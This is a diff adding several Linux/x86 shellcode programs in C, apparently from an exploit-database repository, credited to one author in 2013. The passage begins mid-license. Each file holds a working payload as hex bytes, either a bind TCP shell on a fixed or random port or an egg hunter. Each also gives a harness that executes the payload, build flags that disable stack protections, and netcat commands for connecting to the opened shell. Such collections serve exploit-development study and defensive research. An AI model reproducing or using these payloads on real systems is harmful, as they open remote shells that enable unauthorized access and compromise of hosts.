+ With the great support from Tiago Natel, Sec Plus
+
+   http://www.secplus.com.br/
+   tiago4orion@gmail.com
+
+ This source is licensed under the Creative Commons
+ Attribution-ShareAlike 3.0 Brazil License.
+
+ To view a copy of this license, visit
+
+   http://creativecommons.org/licenses/by-sa/3.0/
+
+ You are free:
+
+    to Share - to copy, distribute and transmit the work
+    to Remix - to adapt the work
+    to make commercial use of the work
+
+ Under the following conditions:
+   Attribution - You must attribute the work in the manner
+                 specified by the author or licensor (but
+                 not in any way that suggests that they
+                 endorse you or your use of the work).
+
+   Share Alike - If you alter, transform, or build upon
+                 this work, you may distribute the
+                 resulting work only under the same or
+                 similar license to this one.
+
+*/
+
+/*
+
+ shell_bind_tcp_random_port_shellcode
+
+ * 65 bytes
+ * null-bytes free
+ * the port number is set by the system and can be discovered using nmap
+   (see http://manuals.ts.fujitsu.com/file/4686/posix_s.pdf, page 23, section 2.6.6)
+
+
+ # gcc -m32 -fno-stack-protector -z execstack shell_bind_tcp_random_port_shellcode.c -o shell_bind_tcp_random_port_shellcode
+ # ./shell_bind_tcp_random_port_shellcode
+
+ Testing
+ # netstat -anp | grep shell
+ # nmap -sS 127.0.0.1 -p-  (It's necessary to use the TCP SYN scan option [-sS]; thus avoids that nmap connects to the port open by shellcode)
+ # nc 127.0.0.1 port
+
+*/
+
+#include <stdio.h>
+#include <string.h>
+
+unsigned char code[] = \
+
+"\x6a\x66\x58\x99\x6a\x01\x5b\x52\x53\x6a\x02\x89"
+"\xe1\xcd\x80\x89\xc6\x5f\xb0\x66\xb3\x04\x52\x56"
+"\x89\xe1\xcd\x80\xb0\x66\x43\x89\x54\x24\x08\xcd"
+"\x80\x93\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b"
+"\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89"
+"\xe3\x52\x53\xeb\xca";
+
+main ()
+{
+
+	printf("Shellcode Length:  %d\n", strlen(code));
+
+	int (*ret)() = (int(*)())code;
+
+	ret();
+
+}
--- a/shellcodes/linux_x86/43729.c
+++ b/shellcodes/linux_x86/43729.c
@ -0,0 +1,92 @@
+/*
+
+ Shell Bind TCP (GetPC/Call/Ret Method) - C Language
+ Linux/x86
+
+ Written in 2013 by Geyslan G. Bem, Hacking bits
+
+   http://hackingbits.com
+   geyslan@gmail.com
+
+ This source is licensed under the Creative Commons
+ Attribution-ShareAlike 3.0 Brazil License.
+
+ To view a copy of this license, visit
+
+   http://creativecommons.org/licenses/by-sa/3.0/
+
+ You are free:
+
+    to Share - to copy, distribute and transmit the work
+    to Remix - to adapt the work
+    to make commercial use of the work
+
+ Under the following conditions:
+   Attribution - You must attribute the work in the manner
+                 specified by the author or licensor (but
+                 not in any way that suggests that they
+                 endorse you or your use of the work).
+
+   Share Alike - If you alter, transform, or build upon
+                 this work, you may distribute the
+                 resulting work only under the same or
+                 similar license to this one.
+
+*/
+
+/*
+
+ shell_bind_tcp_getpc_shellcode
+
+ * 89 bytes
+ * null-bytes free
+ * uses GetPC method for fun and profit
+
+
+ # gcc -m32 -fno-stack-protector -z execstack shell_bind_tcp_getpc_shellcode.c -o shell_bind_tcp_getpc_shellcode
+ # ./shell_bind_tcp_getpc_shellcode
+
+ Testing
+ # nc 127.0.0.1 11111
+
+*/
+
+
+#include <stdio.h>
+#include <string.h>
+
+unsigned char code[] = \
+
+"\xe8\xff\xff\xff\xff\xc3\x5d\x8d\x6d\x4a\x31\xc0"
+"\x99\x6a\x01\x5b\x52\x53\x6a\x02\xff\xd5\x96\x5b"
+"\x52\x66\x68\x2b\x67\x66\x53\x89\xe1\x6a\x10\x51"
+"\x56\xff\xd5\x43\x43\x52\x56\xff\xd5\x43\x52\x52"
+"\x56\xff\xd5\x93\x59\xb0\x3f\xcd\x80\x49\x79\xf9"
+"\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"
+"\x6e\x89\xe3\x52\x53\xeb\x04\x5f\x6a\x66\x58\x89"
+"\xe1\xcd\x80\x57\xc3";
+
+main ()
+{
+
+        // When the IP contains null-bytes, printf will show a wrong shellcode length.
+
+	printf("Shellcode Length:  %d\n", strlen(code));
+
+	// Pollutes all registers ensuring that the shellcode runs in any circumstance.
+
+	__asm__ ("movl $0xffffffff, %eax\n\t"
+		 "movl %eax, %ebx\n\t"
+		 "movl %eax, %ecx\n\t"
+		 "movl %eax, %edx\n\t"
+		 "movl %eax, %esi\n\t"
+		 "movl %eax, %edi\n\t"
+		 "movl %eax, %ebp");
+
+
+	// Setting the port number (byte reverse order) and Calling the shellcode
+
+	__asm__ ("movw $0x672b, (code+27)\n\t"
+		"call code");
+	
+}
--- a/shellcodes/linux_x86/43730.c
+++ b/shellcodes/linux_x86/43730.c
@ -0,0 +1,91 @@
+/*
+
+ Tiny Shell Bind TCP Shellcode - C Language
+ Linux/x86
+
+ Written in 2013 by Geyslan G. Bem, Hacking bits
+
+   http://hackingbits.com
+   geyslan@gmail.com
+
+ This source is licensed under the Creative Commons
+ Attribution-ShareAlike 3.0 Brazil License.
+
+ To view a copy of this license, visit
+
+   http://creativecommons.org/licenses/by-sa/3.0/
+
+ You are free:
+
+    to Share - to copy, distribute and transmit the work
+    to Remix - to adapt the work
+    to make commercial use of the work
+
+ Under the following conditions:
+   Attribution - You must attribute the work in the manner
+                 specified by the author or licensor (but
+                 not in any way that suggests that they
+                 endorse you or your use of the work).
+
+   Share Alike - If you alter, transform, or build upon
+                 this work, you may distribute the
+                 resulting work only under the same or
+                 similar license to this one.
+
+*/
+
+/*
+
+ tiny_shell_bind_tcp_shellcode
+
+ * 73 bytes
+ * null-free if the port is
+
+
+ # gcc -m32 -fno-stack-protector -z execstack tiny_shell_bind_tcp_shellcode.c -o tiny_shell_bind_tcp_shellcode
+
+ Testing
+ # ./tiny_shell_bind_tcp_shellcode
+ # nc 127.0.0.1 11111
+
+*/
+
+
+#include <stdio.h>
+#include <string.h>
+
+unsigned char code[] = \
+
+"\x31\xdb\xf7\xe3\xb0\x66\x43\x52\x53\x6a"
+"\x02\x89\xe1\xcd\x80\x5b\x5e\x52\x66\x68"
+"\x2b\x67\x6a\x10\x51\x50\xb0\x66\x89\xe1"
+"\xcd\x80\x89\x51\x04\xb0\x66\xb3\x04\xcd"
+"\x80\xb0\x66\x43\xcd\x80\x59\x93\x6a\x3f"
+"\x58\xcd\x80\x49\x79\xf8\xb0\x0b\x68\x2f"
+"\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3"
+"\x41\xcd\x80";
+
+main ()
+{
+
+        // When the Port contains null bytes, printf will show a wrong shellcode length.
+
+	printf("Shellcode Length:  %d\n", strlen(code));
+
+	// Pollutes all registers ensuring that the shellcode runs in any circumstance.
+
+	__asm__ ("movl $0xffffffff, %eax\n\t"
+		 "movl %eax, %ebx\n\t"
+		 "movl %eax, %ecx\n\t"
+		 "movl %eax, %edx\n\t"
+		 "movl %eax, %esi\n\t"
+		 "movl %eax, %edi\n\t"
+		 "movl %eax, %ebp\n\t"
+
+	// Setting the port
+		 "movw $0x672b, (code+20)\n\t"
+
+	// Calling the shellcode
+		 "call code");
+
+}
--- a/shellcodes/linux_x86/43731.c
+++ b/shellcodes/linux_x86/43731.c
@ -0,0 +1,88 @@
+/*
+
+ Tiny Shell Bind TCP Random Port Shellcode - C Language
+ Linux/x86
+
+ Written in 2013 by Geyslan G. Bem, Hacking bits
+
+   http://hackingbits.com
+   geyslan@gmail.com
+
+ This source is licensed under the Creative Commons
+ Attribution-ShareAlike 3.0 Brazil License.
+
+ To view a copy of this license, visit
+
+   http://creativecommons.org/licenses/by-sa/3.0/
+
+ You are free:
+
+    to Share - to copy, distribute and transmit the work
+    to Remix - to adapt the work
+    to make commercial use of the work
+
+ Under the following conditions:
+   Attribution - You must attribute the work in the manner
+                 specified by the author or licensor (but
+                 not in any way that suggests that they
+                 endorse you or your use of the work).
+
+   Share Alike - If you alter, transform, or build upon
+                 this work, you may distribute the
+                 resulting work only under the same or
+                 similar license to this one.
+
+*/
+
+/*
+
+ tiny_shell_bind_tcp_random_port_shellcode
+
+ * 57 bytes
+ * null-free
+
+
+ # gcc -m32 -fno-stack-protector -z execstack tiny_shell_bind_tcp_random_port_shellcode.c -o tiny_shell_bind_tcp_random_port_shellcode
+
+ Testing
+ # ./tiny_shell_bind_tcp_random_port_shellcode
+ # netstat -anp | grep shell
+ # nmap -sS 127.0.0.1 -p-  (It's necessary to use the TCP SYN scan option [-sS]; thus avoids that nmap connects to th$
+ # nc 127.0.0.1 port
+
+*/
+
+
+#include <stdio.h>
+#include <string.h>
+
+unsigned char code[] = \
+
+"\x31\xdb\xf7\xe3\xb0\x66\x43\x52\x53\x6a"
+"\x02\x89\xe1\xcd\x80\x52\x50\x89\xe1\xb0"
+"\x66\xb3\x04\xcd\x80\xb0\x66\x43\xcd\x80"
+"\x59\x93\x6a\x3f\x58\xcd\x80\x49\x79\xf8"
+"\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62"
+"\x69\x6e\x89\xe3\x41\xcd\x80";
+
+main ()
+{
+
+        // When the Port contains null bytes, printf will show a wrong shellcode length.
+
+	printf("Shellcode Length:  %d\n", strlen(code));
+
+	// Pollutes all registers ensuring that the shellcode runs in any circumstance.
+
+	__asm__ ("movl $0xffffffff, %eax\n\t"
+		 "movl %eax, %ebx\n\t"
+		 "movl %eax, %ecx\n\t"
+		 "movl %eax, %edx\n\t"
+		 "movl %eax, %esi\n\t"
+		 "movl %eax, %edi\n\t"
+		 "movl %eax, %ebp\n\t"
+
+	// Calling the shellcode
+		 "call code");
+
+}
--- a/shellcodes/linux_x86/43732.c
+++ b/shellcodes/linux_x86/43732.c
@ -0,0 +1,87 @@
+/*
+
+   Egg Hunter Shellcode - C Language - Linux/x86
+   Copyright (C) 2013 Geyslan G. Bem, Hacking bits
+
+   http://hackingbits.com
+   geyslan@gmail.com
+
+   This program is free software: you can redistribute it and/or modify
+   it under the terms of the GNU General Public License as published by
+   the Free Software Foundation, either version 3 of the License, or
+   (at your option) any later version.
+
+   This program is distributed in the hope that it will be useful,
+   but WITHOUT ANY WARRANTY; without even the implied warranty of
+   MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+   GNU General Public License for more details.
+
+   You should have received a copy of the GNU General Public License
+   along with this program.  If not, see <http://www.gnu.org/licenses/>.
+
+*/
+
+/*
+
+   egg_hunter_shellcode
+
+   * 38 bytes
+   * null-free if egg signature is
+
+   # gcc -m32 -fno-stack-protector -z execstack egg_hunter_shellcode.c -o egg_hunter_shellcode
+
+   Testing
+   # ./egg_hunter_shellcode
+
+*/
+
+#include <stdio.h>
+#include <string.h>
+
+unsigned char egg[] = \
+
+              // Write "Egg Mark" and exit
+
+              "\x90\x50\x90\x50"   // <- First Four Bytes of Signature
+              "\x90\x50\x90\x50"   // <- Same first bytes are mandatory
+              "\x31\xdb"
+              "\xf7\xe3\xb0\x04\x6a\x0a\x68\x4d\x61\x72"
+              "\x6b\x68\x45\x67\x67\x20\xb3\x01\x89\xe1"
+              "\xb2\x09\xcd\x80\xb0\x01\xcd\x80";
+
+              unsigned char egghunter[] = \
+
+              // Search for the Egg Signature (0x50905090 x 2) - the Egg's 8 first instructions (nop, push eax, nop, push eax...)
+
+              "\xfc\x31\xc9\xf7\xe1\x66\x81\xca\xff\x0f"
+              "\x42\x6a\x21\x58\x8d\x5a\x04\xcd\x80\x3c"
+              "\xf2\x74\xee\xb8"
+              "\x90\x50\x90\x50"   // <- Signature
+              "\x89\xd7\xaf\x75\xe9\xaf\x75\xe6\xff\xe7";
+
+
+main ()
+{
+
+    // When contains null bytes, printf will show a wrong shellcode length.
+
+    printf("Shellcode Length:  %d\n", strlen(egghunter));
+
+    // Pollutes all registers ensuring that the shellcode runs in any circumstance.
+
+    __asm__ ("movl $0xffffffff, %eax\n\t"
+            "movl %eax, %ebx\n\t"
+            "movl %eax, %ecx\n\t"
+            "movl %eax, %edx\n\t"
+            "movl %eax, %esi\n\t"
+            "movl %eax, %edi\n\t"
+            "movl %eax, %ebp\n\t"
+
+            // Setting the egg hunter signature to search (byte reverse order)
+
+            "movl $0x50905090, (egghunter+24)\n\t"
+
+            // Calling the shellcode
+            "call egghunter");
+
+}